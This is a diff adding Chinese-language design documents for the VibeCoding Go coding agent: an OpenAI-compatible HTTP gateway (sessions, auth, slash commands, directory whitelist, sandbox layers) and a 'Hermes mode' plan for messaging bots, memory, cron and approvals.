+这些是扩展端点，非 OpenAI 标准，前缀 `/v1/vibecoding/` 以区分。
+
+## 5. 架构设计
+
+### 5.1 模块关系
+
+```
+cmd/vibecoding/main.go
+  └── gatewayCmd (cobra.Command)
+        └── internal/gateway/
+              ├── gateway.go         # Server 主逻辑、路由
+              ├── config.go          # gateway.json 加载
+              ├── handler_chat.go    # /v1/chat/completions 处理
+              ├── handler_models.go  # /v1/models
+              ├── handler_health.go  # /health
+              ├── handler_session.go # session 管理端点
+              ├── auth.go            # Bearer Token 中间件
+              ├── commands.go        # /xxx 指令处理
+              ├── session_mgr.go     # 多 session 管理器
+              ├── streaming.go       # SSE streaming 辅助
+              └── types.go           # OpenAI API 类型定义
+```
+
+### 5.2 核心组件
+
+```
+┌─────────────────────────────────────────────────────────┐
+│                    HTTP Server                          │
+│  (net/http, 无外部框架)                                  │
+├──────────┬──────────┬───────────────┬───────────────────┤
+│ Auth MW  │ CORS MW  │  Logging MW   │                   │
+├──────────┴──────────┴───────────────┴───────────────────┤
+│                                                         │
+│  /v1/chat/completions ──► ChatHandler                   │
+│       │                                                 │
+│       ├─► SessionPool.GetOrCreate(sessionID)            │
+│       │     └── session.Manager (JSONL)                 │
+│       │                                                 │
+│       ├─► agent.New(Config{...}) + tools.Registry       │
+│       │     └── agent.Run(ctx, userMsg) → <-chan Event  │
+│       │                                                 │
+│       └─► EventToSSE / EventToJSON                      │
+│             └── OpenAI 格式 response                     │
+│                                                         │
+│  /v1/models ──► ModelsHandler                           │
+│       └── provider.Models()                             │
+│                                                         │
+│  /health ──► HealthHandler                              │
+│                                                         │
+└─────────────────────────────────────────────────────────┘
+```
+
+### 5.3 请求处理流程
+
+```
+HTTP Request
+    │
+    ▼
+1. Auth Middleware (如果 auth.enabled)
+    │ 检查 Authorization: Bearer <token>
+    │ 失败 → 401 Unauthorized
+    │
+    ▼
+2. CORS Middleware (如果 cors.enabled)
+    │
+    ▼
+3. Route Dispatch
+    │
+    ▼
+4. ChatHandler
+    │
+    ├─ 4a. 解析 OpenAI 格式请求
+    │       - messages → provider.Message 转换
+    │       - 提取 x_session_id（或生成新 ID）
+    │       - 提取 x_mode, x_working_dir
+    │
+    ├─ 4a.1 校验 x_working_dir
+    │       - 有 allowedWorkDirs → 前缀匹配校验
+    │       - 不通过 → 403 Forbidden
+    │
+    ├─ 4a.2 检查最后一条 user message 是否为 /xxx 指令
+    │       - 是指令 → 走指令分发（不创建 agent，不调用 LLM）
+    │       - 非指令 → 继续正常 agent 流程
+    │
+    ├─ 4b. 获取/创建 Session
+    │       - SessionPool.GetOrCreate(id, workDir)
+    │       - 关联 session.Manager, tools.Registry
+    │
+    ├─ 4c. 构建 Agent
+    │       - 复用 agent.Config + agent.New() 模式
+    │       - 加载 context files, skills
+    │       - 如果 enableSubAgents → AgentFactory + AgentManager
+    │
+    ├─ 4d. 将 OpenAI messages 转换为 VibeCoding 内部格式
+    │       - system message → extraContext / systemPrompt
+    │       - user/assistant messages → provider.Message
+    │       - 历史 messages → agent.LoadHistoryMessages()
+    │
+    ├─ 4e. 运行 Agent
+    │       - eventCh := agent.Run(ctx, lastUserMessage)
+    │
+    └─ 4f. 转换输出
+            │
+            ├── stream=true:
+            │   for event := range eventCh:
+            │     EventTextDelta → SSE chunk
+            │     EventToolCall → (内部处理，不暴露给客户端)
+            │     EventDone → final chunk + [DONE]
+            │
+            └── stream=false:
+                收集全部 text → 一次性返回 JSON
+```
+
+### 5.4 Session 管理
+
+```go
+// SessionPool 管理多个并发 session
+type SessionPool struct {
+    mu       sync.RWMutex
+    sessions map[string]*GatewaySession
+    maxSess  int
+    idleTTL  time.Duration
+}
+
+type GatewaySession struct {
+    ID        string
+    WorkDir   string
+    Manager   *session.Manager
+    Registry  *tools.Registry
+    AgentMgr  *agent.AgentManager  // 仅 enableSubAgents 时
+    LastUsed  time.Time
+    mu        sync.Mutex  // 保证单 session 串行处理
+}
+```
+
+**Session 映射策略**:
+
+1. 客户端通过 `x_session_id` 指定 → 直接使用
+2. 未指定 → 每个请求创建新 session（无状态模式）
+3. 通过 Authorization header 的 token hash 做 namespace（可选）
+
+**Session 并发控制**:
+- 每个 session 内部加锁，确保同一 session 的请求串行处理（agent loop 不支持并发）
+- 不同 session 之间完全并行
+
+**Session 生命周期**:
+- 创建：首次请求时自动创建
+- 活跃：有请求在处理或最近有请求
+- 空闲超时清理：后台 goroutine 定期扫描，超过 `idleTimeoutSeconds` 的 session 被销毁
+- 手动销毁：通过 DELETE `/v1/x/sessions/:id`
+
+### 5.5 Tool 调用处理
+
+Gateway 模式下 tool 调用对客户端透明，Agent 内部自动执行（mode 默认 `yolo`）。
+
+Tool 执行状态的可见性由 `toolVisibility.mode` 配置控制：
+
+| mode | 行为 | 兼容性 |
+|------|------|--------|
+| `"content"` (默认) | tool 执行时通过 `content` 字段发送状态信息，如 `[reading main.go...]` | ✅ 完全兼容标准 SDK |
+| `"sse_event"` | 通过扩展 SSE event 发送（`event: tool_status`） | ⚠️ 不兼容标准 OpenAI SDK，适合自定义客户端 |
+| `"none"` | 不发送任何 tool 状态，客户端只见最终文本 | ✅ 最干净 |
+
+**`content` 模式示例**（streaming）:
+```
+data: {"choices":[{"delta":{"content":"[reading main.go...]\n"}}]}
+data: {"choices":[{"delta":{"content":"[running: go test ./...]\n"}}]}
+data: {"choices":[{"delta":{"content":"Here is the analysis..."}}]}
+```
+
+**`sse_event` 模式示例**（streaming）:
+```
+event: tool_status
+data: {"tool":"read","status":"running","args":{"path":"main.go"}}
+
+data: {"choices":[{"delta":{"content":"Here is the analysis..."}}]}
+```
+
+**Non-streaming 响应**: 无论哪种 mode，tool 执行记录始终可通过扩展字段 `x_tool_calls` 返回。
+
+### 5.6 Sub-Agent 集成
+
+当 `enableSubAgents: true` 时：
+
+```
+ChatHandler
+    └── 每个 Session 维护独立的 AgentFactory + AgentManager
+          └── 主 agent 可调用 subagent_spawn/status/send/destroy
+                └── sub-agent 的事件也会收集到主 agent 的输出流中
+```
+
+复用现有 `agent.AgentFactory` / `agent.AgentManager` / `agent.SubAgent*Tool`，无需改动核心 agent 逻辑。
+
+### 5.7 指令系统 (Slash Commands)
+
+Gateway 支持通过用户消息内容发送 `/xxx` 指令，与 TUI 中的指令体验对齐。
+
+**触发规则**: 当请求的 messages 中最后一条 `user` 消息以 `/` 开头时，
+视为指令调用。指令不经过 agent/LLM，直接在 gateway 层处理，立即返回结果。
+
+**请求示例**:
+```jsonc
+{
+  "model": "deepseek-v4-flash",
+  "messages": [
+    {"role": "user", "content": "/clear"}
+  ],
+  "stream": false,
+  "x_session_id": "sess-abc123"
+}
+```
+
+**响应格式**: 始终使用标准 OpenAI 响应结构，指令结果放在 `content` 中，
+`finish_reason` 为 `"stop"`，扩展字段 `x_command` 标识这是指令响应：
+
+```json
+{
+  "id": "chatcmpl-cmd-xxx",
+  "object": "chat.completion",
+  "created": 1716883200,
+  "model": "deepseek-v4-flash",
+  "choices": [{
+    "index": 0,
+    "message": {"role": "assistant", "content": "✅ Conversation cleared"},
+    "finish_reason": "stop"
+  }],
+  "usage": {"prompt_tokens": 0, "completion_tokens": 0, "total_tokens": 0},
+  "x_command": "/clear",
+  "x_session_id": "sess-abc123"
+}
+```
+
+**支持的指令**:
+
+| 指令 | 说明 | 需要 session |
+|------|------|---------------|
+| `/clear` | 清空当前 session 的对话上下文（agent 重置，消息清空，session 保留） | 是 |
+| `/mode [plan\|agent\|yolo]` | 查看或切换当前 session 的模式 | 是 |
+| `/model [model_id]` | 查看或切换模型 | 否 |
+| `/models` | 列出可用模型（等同 GET `/v1/models`） | 否 |
+| `/sessions` | 列出当前 workDir 下的 session | 否 |
+| `/sessions clear` | 创建新 session，返回新 session ID | 否 |
+| `/sessions del <id>` | 删除指定 session | 否 |
+| `/compact` | 手动触发当前 session 的上下文压缩 | 是 |
+| `/status` | 查看当前 session 状态（消息数、上下文占用、mode 等） | 是 |
+| `/skill <name>` | 激活 skill | 是 |
+| `/skills` | 列出可用 skills | 否 |
+| `/help` | 列出所有可用指令 | 否 |
+
+**不支持的 TUI 指令**:
+- `/quit` — 无意义，Gateway 是服务进程
+- `/agent` 系列 — sub-agent 由 agent 内部管理，客户端无需直接操作
+- `/init_mcp` — MCP 配置属于服务端管理，不应通过 API 暴露
+
+**实现位置**: `internal/gateway/commands.go`
+
+```go
+// CommandResult 表示指令执行结果
+type CommandResult struct {
+    Message string // 返回给客户端的文本
+    Error   bool   // 是否为错误
+}
+
+// handleCommand 拦截并处理 /xxx 指令
+// 返回 nil 表示不是指令，应走正常 agent 流程
+func (s *Server) handleCommand(sessionID, cmd string) *CommandResult {
+    parts := strings.Fields(cmd)
+    switch parts[0] {
+    case "/clear":
+        // 重置 session 的 agent + 消息历史
+    case "/mode":
+        // 查看/切换 session 的 mode
+    case "/status":
+        // 返回 session 状态信息
+    // ...
+    default:
+        return &CommandResult{Message: "Unknown command: " + parts[0], Error: true}
+    }
+}
+```
+
+**与 TUI 指令的关系**:
+- Gateway 指令和 TUI 指令分开实现（TUI 依赖 Bubble Tea，无法复用）
+- 保持语义一致：相同的指令名、相同的行为
+- 未来可抽取共享的指令定义层（Phase 3）
+
+## 6. 认证设计
+
+### 6.1 Bearer Token
+
+```
+Authorization: Bearer sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+```
+
+- `gateway.json` 中配置 `auth.tokens` 列表
+- 中间件对每个请求检查 header
+- 多 token 支持（团队场景，每人一个 token）
+- `/health` 端点不做认证
+
+### 6.2 认证关闭（默认）
+
+`auth.enabled: false` 时跳过所有认证检查。适用于本地开发、内网部署。
+
+### 6.3 未来扩展（本期不做）
+
+- OAuth2 / OIDC
+- API Key + Rate Limiting
+- mTLS
+
+## 7. 与现有模块的关系
+
+| 现有模块 | Gateway 复用方式 |
+|---------|-----------------|
+| `internal/config` | 加载 `settings.json`，读取 provider/model 配置 |
+| `internal/provider` + `factory` | 创建 LLM provider 实例 |
+| `internal/agent` | 核心 agent loop、tool execution、multi-agent |
+| `internal/session` | JSONL session 存储（每个 gateway session 一个 Manager） |
+| `internal/tools` | tool registry（每个 session 独立 registry） |
+| `internal/contextfiles` | 加载 AGENTS.md/CLAUDE.md |
+| `internal/skills` | 加载 skills |
+| `internal/sandbox` | sandbox 管理 |
+| `internal/mcp` | MCP server 连接（可选） |
+
+**新增模块**: `internal/gateway/` — 仅包含 HTTP 层 + session 池 + OpenAI 格式转换，不引入新的 agent 逻辑。
+
+## 8. OpenAI 格式转换
+
+### 8.1 输入转换 (OpenAI → VibeCoding)
+
+```
+OpenAI messages[] ──►  VibeCoding 内部
+─────────────────      ──────────────────
+system message    →    根据 systemPromptMode 处理（见下方）
+user message      →    provider.NewUserMessage(text)
+assistant message →    provider.NewAssistantMessage(blocks)
+                       （含历史 tool_calls 的 assistant message → 跳过或简化）
+```
+
+**System prompt 处理**（由 `gateway.json` 的 `systemPromptMode` 控制）:
+
+| systemPromptMode | 行为 |
+|------------------|------|
+| `"append"` (默认) | 客户端 system message 追加到内置 system prompt 末尾（作为 extraContext）。保留 tool 说明、mode 指令等内置内容，同时尊重客户端的补充指令。 |
+| `"ignore"` | 忽略客户端 system message。完全使用 VibeCoding 内置 system prompt，适合不希望客户端干扰 agent 行为的场景。 |
+
+**其他关键决策**:
+- 只取最后一条 `user` 消息作为 `agent.Run(ctx, userMsg)` 的输入
+- 之前的历史消息通过 `agent.LoadHistoryMessages()` 注入
+
+### 8.2 输出转换 (VibeCoding Event → OpenAI)
+
+```
+VibeCoding Event         OpenAI Chunk (toolVisibility 决定)
+──────────────           ───────────────
+EventTextDelta      →    {"delta": {"content": text}}
+EventThinkDelta     →    (不暴露 / 或通过扩展字段)
+EventToolCall       →    content: "[reading main.go...]"  (mode=content)
+                         event: tool_status               (mode=sse_event)
+                         (不发送)                          (mode=none)
+EventToolResult     →    (内部处理，不暴露)
+EventDone           →    {"finish_reason": "stop"} + usage
+EventError          →    HTTP 500 or error chunk
+EventUsage          →    usage 字段
+```
+
+## 9. 实现计划
+
+### Phase 1: 最小可用 (MVP)
+
+1. **`internal/gateway/config.go`** — gateway.json 加载 + DefaultGatewayConfig() 模板
+2. **`internal/gateway/types.go`** — OpenAI API 请求/响应类型
+3. **`internal/gateway/auth.go`** — Bearer Token 认证中间件
+4. **`internal/gateway/session_mgr.go`** — SessionPool 多 session 管理
+5. **`internal/gateway/commands.go`** — /xxx 指令处理
+6. **`internal/gateway/handler_chat.go`** — `/v1/chat/completions` 核心处理
+7. **`internal/gateway/handler_models.go`** — `/v1/models`
+8. **`internal/gateway/handler_health.go`** — `/health`
+9. **`internal/gateway/streaming.go`** — SSE 流式输出辅助
+10. **`internal/gateway/gateway.go`** — Server 启动、路由组装
+11. **`cmd/vibecoding/main.go`** — 添加 `gateway` 子命令 + `--init-gateway` flag
+
+### Phase 2: 增强
+
+11. Sub-Agent 集成
+12. Session 管理 API (`/v1/x/sessions`)
+13. CORS 支持
+14. Graceful shutdown
+15. 请求日志 + metrics
+
+### Phase 3: 生产化
+
+16. Rate limiting
+17. 请求大小限制
+18. Timeout 控制
+19. 文档 (docs/en/gateway.md, docs/zh/gateway.md)
+
+## 10. 关键设计决策
+
+### D1: 不引入外部 HTTP 框架
+
+使用 `net/http` 标准库。VibeCoding 定位轻量，不需要 gin/echo/fiber。中间件用 `http.Handler` 包装即可。
+
+### D2: 默认 mode 为 yolo
+
+Gateway 场景不存在 TUI 交互，tool approval 无法实现。默认使用 `yolo` 模式，tool 自动执行。
+如果未来需要 approval，可通过 webhook callback 实现。
+
+### D3: Tool 可见性可配置
+
+Agent 内部的 read/write/bash/grep 等 tool 调用的可见性由 `toolVisibility.mode` 控制：
+- `"content"` (默认): tool 执行时在 streaming 的 content 中发送状态文本，客户端可感知进度
+- `"sse_event"`: 通过扩展 SSE event 发送，适合自定义客户端
+- `"none"`: 完全透明，客户端只见最终文本
+
+Non-streaming 响应始终可通过扩展字段 `x_tool_calls` 查看 tool 执行记录。
+
+### D4: Session 映射策略
+
+- 无 `x_session_id` → 每请求新建 session（简单、无状态）
+- 有 `x_session_id` → 多轮对话共享 session（有状态）
+- Session 不持久化跨重启（重启清空），但 JSONL 文件保留可恢复
+
+### D5: 每个 session 串行处理
+
+同一个 session 的请求串行化（mutex），避免 agent loop 并发问题。
+不同 session 完全并行，充分利用多核。
+
+### D6: 消息历史处理
+
+gateway 仅使用 session 内已有的消息历史 + 当前请求的最新消息。
+不依赖客户端传入的 messages 数组做完整历史重放（因为 agent 内部已有 session 管理）。
+
+但如果是新 session（无 `x_session_id` 或 session 不存在），
+则客户端传入的 messages 数组会被当作完整历史注入。
+
+### D7: allowedWorkDirs 白名单
+
+请求通过 `x_working_dir` 切换工作目录时，必须通过白名单校验：
+
+```
+请求 x_working_dir
+    │
+    ▼
+1. allowedWorkDirs 为 null（未设置）→ 放行（不校验）
+2. allowedWorkDirs 为 []（空数组）→ 拒绝一切切换，只能用 workingDir 默认值
+3. allowedWorkDirs 有条目 → 前缀匹配，任一匹配则放行
+    │ 不匹配 → 403 Forbidden
+```
+
+**前缀匹配规则**: `filepath.Clean(requestDir)` 必须以 `filepath.Clean(allowedDir)` 开头，
+且边界必须在路径分隔符上。例如 `/home/user/projects` 允许 `/home/user/projects/foo`，
+但不允许 `/home/user/projects-evil`。
+
+`workingDir` 默认值本身不受白名单限制（它是管理员配置的可信值）。
+
+### D8: Sandbox 与 Gateway 安全分层
+
+Gateway 面向网络，安全模型比 CLI 更严格，采用三层防护：
+
+| 层次 | 机制 | 作用 |
+|------|------|------|
+| **L1: 认证** | Bearer Token | 阻止未授权访问 |
+| **L2: 目录管控** | allowedWorkDirs | 限制 agent 可操作的文件系统范围 |
+| **L3: 系统沙箱** | sandbox (bwrap) | OS 级隔离，限制文件读写、网络等 |
+
+三层独立配置，互不依赖：
+- 仅开 L1 → 本地可信用户场景
+- L1 + L2 → 多用户/多项目场景
+- L1 + L2 + L3 → 面向公网或高安全要求场景
+
+Sandbox 配置复用 `settings.json` 中的 `sandbox` 字段（`allowedRead`, `deniedPaths`, `passEnv` 等），
+`gateway.json` 的 `sandbox.enabled` / `sandbox.level` 仅控制是否启用和级别覆盖。
+这与 CLI `--sandbox` flag 的行为一致。
+
+### D9: System Prompt 处理可配置
+
+通过 `systemPromptMode` 控制客户端 system message 的处理方式：
+- `"append"` (默认): 追加到内置 system prompt 末尾。保留 tool 说明、mode 指令，同时接受客户端补充指令。
+- `"ignore"`: 忽略客户端 system message。完全使用内置 prompt，防止客户端干扰 agent 行为。
+
+选择 `"append"` 是因为大多数 OpenAI 客户端都会发 system message（例如 Cursor、Open WebUI），
+完全忽略会让用户困惑。追加模式既保留了 VibeCoding 的完整能力，又尊重客户端的自定义指令。
+
+### D10: --init-gateway 配置初始化
+
+`vibecoding --init-gateway` 生成 `gateway.json` 模板到 `~/.vibecoding/gateway.json`。
+
+行为：
+- 文件不存在 → 创建并写入默认模板
+- 文件已存在 → 提示已存在，不覆盖
+- `--force` → 强制覆盖
+
+模板内容包含所有字段及注释说明，用户只需取消注释并填写即可。
+实现位置: `internal/gateway/config.go` 中的 `DefaultGatewayConfig()` + `SaveGatewayConfig()`。
+这与 `ensureConfigExists()` 写 `settings.json` 的模式一致。
+
+## 11. 风险与注意事项
+
+| 风险 | 缓解 |
+|------|------|
+| Agent loop 挂起（tool 执行超时） | 请求级 context timeout（默认 30 分钟），可配置 |
+| 内存膨胀（大量 session） | idleTimeout 自动清理 + maxSessions 限制 |
+| 并发安全 | session 级 mutex + pool 级 RWMutex |
+| tool 执行安全 | allowedWorkDirs 白名单 + sandbox 可选开启；建议公网部署开启 sandbox |
+| 目录穿越 | allowedWorkDirs 前缀匹配 + filepath.Clean 规范化 |
+| token 泄露 | gateway.json 建议 0600 权限；token 支持环境变量引用 |
+| 长连接 SSE 断开 | client context cancel → agent.Abort() |
+
+## 12. 使用示例
+
+### 本地开发（无认证）
+
+```bash
+# 启动
+vibecoding gateway
+
+# 测试
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "list files in current directory"}],
+    "stream": false
+  }'
+```
+
+### 有认证
+
+```bash
+vibecoding gateway
+
+curl http://localhost:8080/v1/chat/completions \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Bearer sk-my-secret-token" \
+  -d '{
+    "model": "deepseek-v4-flash",
+    "messages": [{"role": "user", "content": "explain main.go"}],
+    "stream": true
+  }'
+```
+
+### Python OpenAI SDK
+
+```python
+from openai import OpenAI
+
+client = OpenAI(
+    base_url="http://localhost:8080/v1",
+    api_key="sk-my-secret-token",  # 如果开启了认证
+)
+
+response = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[
+        {"role": "system", "content": "You are a coding assistant."},
+        {"role": "user", "content": "Read main.go and explain the architecture."},
+    ],
+    stream=True,
+)
+
+for chunk in response:
+    if chunk.choices[0].delta.content:
+        print(chunk.choices[0].delta.content, end="")
+```
+
+### 多轮对话（带 session）
+
+```python
+# 第一轮
+response1 = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "read main.go"}],
+    extra_body={"x_session_id": "my-session-1"},
+)
+
+# 第二轮（同 session，agent 记住了上下文）
+response2 = client.chat.completions.create(
+    model="deepseek-v4-flash",
+    messages=[{"role": "user", "content": "now refactor the error handling"}],
+    extra_body={"x_session_id": "my-session-1"},
+)
+```
+
+## 13. 待讨论
+
+所有原待讨论项均已决定，见下方汇总。如有新议题再追加。
+
+### 已决定事项
+
+| # | 议题 | 决定 | 对应配置字段 |
+|---|--------|------|---------------|
+| 1 | Tool 可见性 | 默认 `content` 模式（混入 `content` 字段），可配为 `sse_event` 或 `none` | `toolVisibility.mode` |
+| 2 | System prompt | 默认 `append`（追加到内置 prompt 末尾），可配为 `ignore` | `systemPromptMode` |
+| 3 | Working directory | `allowedWorkDirs` 白名单 + sandbox 双重保护 | `allowedWorkDirs` |
+| 4 | 请求超时 | 默认 30 分钟，streaming 有数据流动不超时 | `requestTimeoutSeconds` |
+| 5 | 并发限制 | 默认不限制，可配置 | `maxConcurrentRequests` |
diff --git a/docs/proposal/hermes-mode-proposal.md b/docs/proposal/hermes-mode-proposal.md
new file mode 100644
index 0000000..a7cd5fb
--- /dev/null
+++ b/docs/proposal/hermes-mode-proposal.md
@@ -0,0 +1,1652 @@
+# v0.1.27 Hermes 模式 — 研发计划
+
+> **日期**: 2026-05-29
+> **目标版本**: v0.1.27
+> **状态**: 🔧 开发进行中（核心功能已完成）
+> **审核日期**: 2026-05-30
+> **整体进度**: 100%（所有功能已实现，文档已完成）
+> **v2 修订**: 2026-05-30 — 基于实现审核重新梳理优先级和范围
+
+---
+
+## 1. 概述
+
+VibeCoding 当前提供三种运行模式：**CLI (TUI)**、**ACP (编辑器集成)**、**Gateway (HTTP API)**。
+
+本提案引入第四种运行模式 **`hermes`** — 通过 `vibecoding hermes` 子命令启动，提供**消息平台网关 + 自动化调度 + 持久化记忆**等能力，让 VibeCoding 从"编码助手"扩展为"可部署的自主代理"。
+
+### 设计哲学
+
+- **渐进式采纳**：Hermes 模式是对现有 CLI/Gateway 的增强，不是替代
+- **复用优先**：尽量复用已有的 agent loop、provider、tools、session、sandbox 基础设施
+- **Go 原生**：VibeCoding 是 Go 项目，不移植 Python 生态，只借鉴架构思路
+- **缓存友好**：memory 等动态内容通过 tool call 按需加载（同 `skill_ref`），不注入 system prompt，保护 prompt cache 命中率
+
+---
+
+## 2. 配置目录约定
+
+VibeCoding 使用 **全局 + 项目级** 的两层配置体系，项目级优先级更高。
+
+### 2.1 全局配置目录 `<GLOBAL_DIR>`
+
+存放全局默认配置、凭证、sessions、skills 等。路径因平台而异：
+
+| 平台 | 默认路径 | 来源 |
+|------|----------|------|
+| **Linux/macOS** | `~/.vibecoding/` | `platform.ConfigDir()` |
+| **Windows** | `%APPDATA%\vibecoding\` | `platform.ConfigDir()` |
+| **自定义** | `$VIBECODING_DIR` | 环境变量覆盖，优先级最高 |
+
+> 后文中 `<GLOBAL_DIR>` 均指上述路径。Linux/macOS 下即 `~/.vibecoding/`。
+
+全局目录下的文件布局：
+
+```
+<GLOBAL_DIR>/
+├── settings.json               # 全局 agent/provider 配置
+├── gateway.json                # 全局 Gateway 配置
+├── hermes.json                 # 全局 Hermes 配置（本提案新增）
+├── mcp.json                    # MCP 工具服务配置
+├── memory.md                   # 全局持久化记忆（本提案新增）
+├── wechat-credentials.json     # 微信 iLink 凭证（本提案新增）
+├── sessions/                   # JSONL 会话存储
+└── skills/                     # 全局 skills
+```
+
+### 2.2 项目级配置目录 `.vibe/`
+
+存放项目专属的配置覆盖，位于项目工作目录根下。**项目级配置优先级高于全局配置**，加载顺序：
+
+```
+defaults → <GLOBAL_DIR>/<file> → .vibe/<file>
+```
+
+即：先加载内置默认值，再加载全局配置，最后用项目级配置覆盖合并。
+
+项目级目录下的文件布局：
+
+```
+<project>/
+└── .vibe/
+    ├── settings.json           # 项目级 agent/provider 配置覆盖
+    ├── gateway.json            # 项目级 Gateway 配置覆盖
+    ├── hermes.json             # 项目级 Hermes 配置覆盖（本提案新增）
+    ├── memory.md               # 项目级持久化记忆（本提案新增）
+    └── skills/                 # 项目级 skills
+```
+
+### 2.3 各配置文件的层级关系
+
+| 配置文件 | 全局路径 | 项目级路径 | 合并策略 |
+|----------|----------|------------|----------|
+| `settings.json` | `<GLOBAL_DIR>/settings.json` | `.vibe/settings.json` | 深度合并（已实现） |
+| `gateway.json` | `<GLOBAL_DIR>/gateway.json` | `.vibe/gateway.json` | JSON overlay（已实现） |
+| `hermes.json` | `<GLOBAL_DIR>/hermes.json` | `.vibe/hermes.json` | ✅ JSON overlay（已实现，`LoadHermesConfig()` 使用 `json.Unmarshal` 覆盖合并） |
+| `memory.md` | `<GLOBAL_DIR>/memory.md` | `.vibe/memory.md` | ✅ 项目级存在时**只读项目级**（已实现，`store.go` `Resolve()` 按优先级查找） |
+
+### 2.4 memory.md 查找逻辑
+
+> ✅ **已实现** — `internal/memory/store.go` 的 `Resolve()` 方法完整实现了以下优先级。
+
+memory 工具查找记忆文件时遵循以下优先级：
+
+1. `hermes.json` 中 `memory.path` 显式指定 → 使用指定路径（可以是全局目录）
+2. `.vibe/memory.md` 存在 → 使用项目级记忆
+3. `<GLOBAL_DIR>/memory.md` → fallback 到全局记忆
+4. 均不存在 → 首次写入时创建于 `.vibe/memory.md`（项目上下文中）或 `<GLOBAL_DIR>/memory.md`（无项目上下文时）
+
+> **设计意图**：项目级记忆记录项目相关的上下文（架构决策、代码约定等），全局记忆记录用户偏好和跨项目知识。两者不合并，避免无关项目的记忆干扰当前上下文。
+>
+> **默认行为**：memory.md 默认写入项目目录（`.vibe/memory.md`），只有在 `hermes.json` 中显式配置 `memory.path` 时才写入全局目录。
+
+---
+
+## 3. 已确认的决策
+
+| 决策项 | 结论 | 备注 |
+|--------|------|------|
+| 消息平台 v0.1.27 | **微信 (iLink) + 飞书** | 微信参考 iLink 协议自行实现；飞书用官方 SDK 长连接 |
+| 消息平台 v0.1.28+ | Telegram → Discord | 延后 |
+| 企业微信 | **不做** | 用个人微信 iLink 协议 |
+| Web 搜索工具 | **不做** | 用户通过第三方 skill 自行扩展 |
+| 记忆存储 | **memory.md** | Markdown 文件，人类可读；项目级 `.vibe/memory.md` 优先于全局 `<GLOBAL_DIR>/memory.md` |
+| 记忆注入方式 | **通过 `memory` 工具按需读取**，同 `skill_ref` 模式 | 不注入 system prompt，保护缓存命中 |
+| 配置文件 | **hermes.json** — 独立配置文件 | 同 gateway.json 模式，`.vibe/hermes.json` 覆盖 `<GLOBAL_DIR>/hermes.json` |
+| Shell Hooks | **外部脚本** — JSON stdin/stdout 通信 | 语言无关 |
+| Checkpoints/Rollback | **不做** — 推迟到后续版本 | 降低 v0.1.27 范围 |
+| Session 策略 | **单 session + 命令新建** | 每个 `platform:user_id` 默认一个持久 session，`/new` 强制新建；各平台独立不打通 |
+| Session 存储 | **`<sessionDir>/hermes/` 隔离** | 与 CLI session 分开存储，行为差异大 |
+| A2A 协议 | **采纳** — 独立子命令 `vibecoding a2a`，hermes 通过配置启用 | 详见 §5.3 |
+| Cron 实现 | **CLI 命令范围已确定** | list/add/remove/enable/disable 已满足需求，edit/run 不做。底层 cron 实现与项目共享，有 bug 或缺陷仍需修复完善 |
+| Smart Approvals | **已实现** | 方案 D 分级策略，WebSocket 高风险阻塞审批，消息平台高风险自动拒绝+通知 |
+| Budget Pressure | **已实现** | Event 通知模式，剩余 20% 时触发一次，阈值可配置 |
+
+---
+
+## 4. 能力清单
+
+### 🟢 v0.1.27 采纳
+
+| # | 能力 | 状态 | 实现思路 |
+|---|------|------|----------|
+| 1 | **微信 Bot (iLink 协议)** | ✅ **已完成** | `internal/messaging/wechat/` — 5 个文件完整实现，纯标准库零外部依赖 |
+| 2 | **飞书 Bot** | ✅ **已完成** | `internal/messaging/feishu/feishu.go` — 官方 SDK WebSocket 长连接 |
+| 3 | **消息 Session 管理** | ✅ **已完成** | `dispatcher.go` — per-user 单 session + `/new` 归档 |
+| 4 | **用户白名单** | ✅ **已完成** | `security.go` CheckUserAllowed() |
+| 5 | **Cron** | ✅ **已完成（CLI 范围确定）** | list/add/remove/enable/disable，scheduler 依赖 multi-agent。底层实现与项目共享，有缺陷仍需修复 |
+| 6 | **持久化记忆 (memory.md)** | ✅ **已完成** | `memory/store.go` + `tool.go` — 完整 CRUD |
+| 7 | **User Profile** | ✅ **已完成** | memory.md 默认模板 |
+| 8 | **Budget Pressure** | ✅ **已完成** | `agent.go` loop: 剩余 20% 迭代时触发 `EventBudgetPressure`（一次性），dispatcher 转发到消息平台 |
+| 9 | **Context Pressure** | ✅ **已完成** | `agent.go` loop: 55% context 使用率时触发 `EventContextPressure`（一次性），上层决策处理。hermes dispatcher 转发到消息平台 |
+| 10 | **Smart Approvals** | ✅ **已完成** | 方案 D 分级策略：low→自动批准 / medium→批准+通知 / high→WebSocket 等待审批(5min超时) / 消息平台自动拒绝+通知 |
+| 11 | **Shell Hooks** | ✅ **已完成** | `hooks/hooks.go` pre/post 外部脚本 |
+| 12 | **Webhook 入站** | ✅ **已完成** | `webhook/router.go` + `webhook_handler.go` |
+| 13 | **A2A 协议 (Server)** | ✅ **已完成** | `internal/a2a/` 独立顶层包，JSON-RPC 2.0 over HTTP + SSE 流式，独立模式 + hermes 集成模式 |
+| 14 | **WebSocket 流式推送** | ✅ **已完成** | `wsDispatcherAdapter` 逐事件转换 agent.Event → WSEvent，支持 text_delta/think_delta/tool_call/tool_result/usage/done |
+| 15 | **hermes stop/status** | ✅ **已完成** | PID 文件 + SIGTERM 信号 + HTTP health 查询 |
+| 16 | **hermes client** | ✅ **已完成** | `internal/hermes/client.go` WebSocket 客户端，支持流式输出 + 斜杠命令 |
+| 17 | **webhook/memory/sessions CLI** | ✅ **已完成** | webhook list、memory show/clear、sessions list（查询运行实例）|
+| 18 | **/api/memory HTTP** | ✅ **已完成** | GET 读取 memory.md（含 source/path）、PUT 更新 memory.md，集成 MemoryStore |
+
+### 🟡 延后（v0.1.28+）
+
+| 能力 | 原因 |
+|------|------|
+| Checkpoints / Rollback | 已确认推迟 |
+| 其他消息平台 | Email, Matrix, Mattermost 等 |
+| 图片生成 / Voice Mode | 非核心 |
+
+
+### 🔴 不做
+
+| 能力 | 原因 |
+|------|------|
+| **Web 搜索** | 用户通过第三方 skill 自行扩展 |
+| **企业微信** | 用个人微信 iLink 协议代替 |
+| WhatsApp / Signal / SMS | 外部依赖重 |
+| Python Plugins | Go 项目 |
+| RL Training / Batch | Python 生态 |
+
+---
+
